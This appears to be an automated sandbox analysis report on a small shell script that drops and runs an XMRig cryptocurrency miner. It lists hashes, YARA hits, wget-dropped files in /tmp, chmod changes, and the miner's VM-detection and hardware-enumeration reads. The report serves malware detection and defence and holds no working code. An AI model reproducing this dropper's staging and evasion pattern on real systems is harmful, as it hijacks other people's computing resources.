Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
24/10/2024, 01:53
Static task
static1
Behavioral task
behavioral1
Sample
8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb.sh
-
Size
244B
-
MD5
9206fb1df325876fc6297e75be2a7d5a
-
SHA1
2361ae7b1d637d0a4259f67cc36c2af142541262
-
SHA256
8f492296456c0f28341431bc48d294607ab2cecdecb74ae69d79fc11c242edfb
-
SHA512
12ce08238c8fc3e8591700718e3018c8405b946f38360655c394bc6801f7204b27c505f981da161fe16c3f570eb066c367ff86aa73163b3b7ddc37d3e14c3402
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/files/fstream-2.dat family_xmrig behavioral1/files/fstream-2.dat xmrig -
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1528 chmod 1529 chmod 1530 chmod -
Executes dropped EXE 43 IoCs
ioc pid Process /tmp/check.sh 1531 check.sh /tmp/xmrigDaemon 1533 xmrigDaemon /tmp/xmrigMiner 1535 xmrigMiner /tmp/xmrigMiner 1543 xmrigMiner /tmp/xmrigMiner 1551 xmrigMiner /tmp/xmrigMiner 1559 xmrigMiner /tmp/xmrigMiner 1567 xmrigMiner /tmp/xmrigMiner 1575 xmrigMiner /tmp/xmrigMiner 1583 xmrigMiner /tmp/xmrigMiner 1591 xmrigMiner /tmp/xmrigMiner 1599 xmrigMiner /tmp/xmrigMiner 1607 xmrigMiner /tmp/xmrigMiner 1615 xmrigMiner /tmp/xmrigMiner 1623 xmrigMiner /tmp/xmrigMiner 1631 xmrigMiner /tmp/xmrigMiner 1641 xmrigMiner /tmp/xmrigMiner 1649 xmrigMiner /tmp/xmrigMiner 1657 xmrigMiner /tmp/xmrigMiner 1665 xmrigMiner /tmp/xmrigMiner 1673 xmrigMiner /tmp/xmrigMiner 1681 xmrigMiner /tmp/xmrigMiner 1689 xmrigMiner /tmp/xmrigMiner 1697 xmrigMiner /tmp/xmrigMiner 1705 xmrigMiner /tmp/xmrigMiner 1713 xmrigMiner /tmp/xmrigMiner 1721 xmrigMiner /tmp/xmrigMiner 1729 xmrigMiner /tmp/xmrigMiner 1737 xmrigMiner /tmp/xmrigMiner 1745 xmrigMiner /tmp/xmrigMiner 1753 xmrigMiner /tmp/xmrigMiner 1761 xmrigMiner /tmp/xmrigMiner 1769 xmrigMiner /tmp/xmrigMiner 1777 xmrigMiner /tmp/xmrigMiner 1785 xmrigMiner /tmp/xmrigMiner 1793 xmrigMiner /tmp/xmrigMiner 1801 xmrigMiner /tmp/xmrigMiner 1809 xmrigMiner /tmp/xmrigMiner 1817 xmrigMiner /tmp/xmrigMiner 1825 xmrigMiner /tmp/xmrigMiner 1833 xmrigMiner /tmp/xmrigMiner 1841 xmrigMiner /tmp/xmrigMiner 1849 xmrigMiner /tmp/xmrigMiner 1857 xmrigMiner -
Checks hardware identifiers (DMI) 1 TTPs 64 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/sys_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_vendor xmrigMiner -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads hardware information 1 TTPs 64 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/chassis_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_type xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_type xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_uuid xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_serial xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_type xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_serial xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_date xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_date xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_serial xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_serial xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_uuid xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_type xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_serial xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_serial xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_uuid xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_serial xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_date xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_serial xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_serial xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_date xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_type xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_uuid xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/bios_version xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_name xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_serial xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/product_serial xmrigMiner File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag xmrigMiner -
Checks CPU configuration 1 TTPs 41 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner File opened for reading /proc/cpuinfo xmrigMiner -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition xmrigMiner File opened for reading /sys/devices/system/cpu/online xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map xmrigMiner File opened for reading /sys/devices/system/cpu/online xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq xmrigMiner File opened for reading /sys/devices/system/cpu/possible xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/topology/core_siblings xmrigMiner File opened for reading /sys/devices/system/cpu/possible xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/topology/thread_siblings xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level xmrigMiner File opened for reading /sys/devices/system/cpu/online xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/level xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/topology/thread_siblings xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/topology/thread_siblings xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type xmrigMiner File opened for reading /sys/devices/system/cpu/online xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map xmrigMiner File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level xmrigMiner -
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth xmrigMiner File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems xmrigMiner File opened for reading /sys/devices/virtual/dmi/id xmrigMiner File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages xmrigMiner File opened for reading /sys/devices/system/node/node0/meminfo xmrigMiner File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/free_hugepages xmrigMiner File opened for reading /sys/devices/virtual/dmi/id xmrigMiner File opened for reading /sys/devices/system/node/node0/cpumap xmrigMiner File opened for reading /sys/devices/virtual/dmi/id xmrigMiner File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency xmrigMiner File opened for reading /sys/devices/system/node/node0/meminfo xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth xmrigMiner File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency xmrigMiner File opened for reading /sys/devices/system/node/node0/meminfo xmrigMiner File opened for reading /sys/devices/system/node/node0/meminfo xmrigMiner File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus xmrigMiner File opened for reading /sys/devices/system/cpu xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency xmrigMiner File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth xmrigMiner File opened for reading /sys/firmware/dmi/tables/smbios_entry_point xmrigMiner File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages xmrigMiner File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus xmrigMiner File opened for reading /sys/bus/dax/devices xmrigMiner File opened for reading /sys/devices/cpu_core/cpus xmrigMiner File opened for reading /sys/firmware/dmi/tables/smbios_entry_point xmrigMiner File opened for reading /sys/devices/system/node/node0/cpumap xmrigMiner File opened for reading /sys/kernel/mm/hugepages xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency xmrigMiner File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems xmrigMiner File opened for reading /sys/bus/soc/devices xmrigMiner File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems xmrigMiner File opened for reading /sys/firmware/dmi/tables/DMI xmrigMiner File opened for reading /sys/devices/virtual/dmi/id xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth xmrigMiner File opened for reading /sys/devices/cpu_atom/cpus xmrigMiner File opened for reading /sys/devices/cpu_core/cpus xmrigMiner File opened for reading /sys/devices/cpu_core/cpus xmrigMiner File opened for reading /sys/devices/system/node/node0/cpumap xmrigMiner File opened for reading /sys/devices/virtual/dmi/id xmrigMiner File opened for reading /sys/devices/system/node/node0/meminfo xmrigMiner File opened for reading /sys/fs/cgroup/unified/cgroup.controllers xmrigMiner File opened for reading /sys/devices/system/node/node0/meminfo xmrigMiner File opened for reading /sys/bus/dax/devices xmrigMiner File opened for reading /sys/bus/dax/devices xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency xmrigMiner File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages xmrigMiner File opened for reading /sys/devices/system/node/online xmrigMiner File opened for reading /sys/firmware/dmi/tables/DMI xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency xmrigMiner File opened for reading /sys/firmware/dmi/tables/DMI xmrigMiner File opened for reading /sys/devices/system/node/node0/cpumap xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth xmrigMiner File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages xmrigMiner File opened for reading /sys/kernel/mm/hugepages xmrigMiner File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/free_hugepages xmrigMiner File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth xmrigMiner File opened for reading /sys/devices/system/cpu xmrigMiner -
description ioc Process File opened for reading /proc/driver/nvidia/gpus xmrigMiner File opened for reading /proc/meminfo xmrigMiner File opened for reading /proc/mounts xmrigMiner File opened for reading /proc/meminfo xmrigMiner File opened for reading /proc/driver/nvidia/gpus xmrigMiner File opened for reading /proc/170/status pgrep File opened for reading /proc/172/status pgrep File opened for reading /proc/587/status pgrep File opened for reading /proc/version_signature xmrigMiner File opened for reading /proc/179/status pgrep File opened for reading /proc/183/cmdline pgrep File opened for reading /proc/1150/cmdline pgrep File opened for reading /proc/driver/nvidia/gpus xmrigMiner File opened for reading /proc/mounts xmrigMiner File opened for reading /proc/sys/vm/nr_hugepages xmrigMiner File opened for reading /proc/cmdline xmrigMiner File opened for reading /proc/10/status pgrep File opened for reading /proc/23/cmdline pgrep File opened for reading /proc/mounts xmrigMiner File opened for reading /proc/1201/cmdline pgrep File opened for reading /proc/cmdline xmrigMiner File opened for reading /proc/5/cmdline pgrep File opened for reading /proc/719/status pgrep File opened for reading /proc/1191/status pgrep File opened for reading /proc/sys/vm/nr_hugepages xmrigMiner File opened for reading /proc/499/cmdline pgrep File opened for reading /proc/meminfo xmrigMiner File opened for reading /proc/meminfo xmrigMiner File opened for reading /proc/self/cpuset xmrigMiner File opened for reading /proc/self/cpuset xmrigMiner File opened for reading /proc/version_signature xmrigMiner File opened for reading /proc/1031/cmdline pgrep File opened for reading /proc/1286/cmdline pgrep File opened for reading /proc/1365/cmdline pgrep File opened for reading /proc/974/status pgrep File opened for reading /proc/1201/status pgrep File opened for reading /proc/self/cpuset xmrigMiner File opened for reading /proc/driver/nvidia/gpus xmrigMiner File opened for reading /proc/version_signature xmrigMiner File opened for reading /proc/1/status pgrep File opened for reading /proc/770/status pgrep File opened for reading /proc/961/cmdline pgrep File opened for reading /proc/self/cpuset xmrigMiner File opened for reading /proc/545/cmdline pgrep File opened for reading /proc/cmdline xmrigMiner File opened for reading /proc/version_signature xmrigMiner File opened for reading /proc/cmdline xmrigMiner File opened for reading /proc/driver/nvidia/gpus xmrigMiner File opened for reading /proc/cmdline xmrigMiner File opened for reading /proc/171/cmdline pgrep File opened for reading /proc/173/status pgrep File opened for reading /proc/1129/cmdline pgrep File opened for reading /proc/16/cmdline pgrep File opened for reading /proc/cmdline xmrigMiner File opened for reading /proc/driver/nvidia/gpus xmrigMiner File opened for reading /proc/mounts xmrigMiner File opened for reading /proc/1133/cmdline pgrep File opened for reading /proc/1517/cmdline pgrep File opened for reading /proc/1531/cmdline pgrep File opened for reading /proc/cmdline xmrigMiner File opened for reading /proc/cmdline xmrigMiner File opened for reading /proc/34/status pgrep File opened for reading /proc/571/status pgrep File opened for reading /proc/1232/cmdline pgrep -
Writes file to tmp directory 46 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/check.sh wget File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/xmrigMiner wget File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/config.json wget File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/xmrigDaemon wget File opened for modification /tmp/config.json xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner File opened for modification /tmp/logggz.lgo xmrigMiner
Processes
-
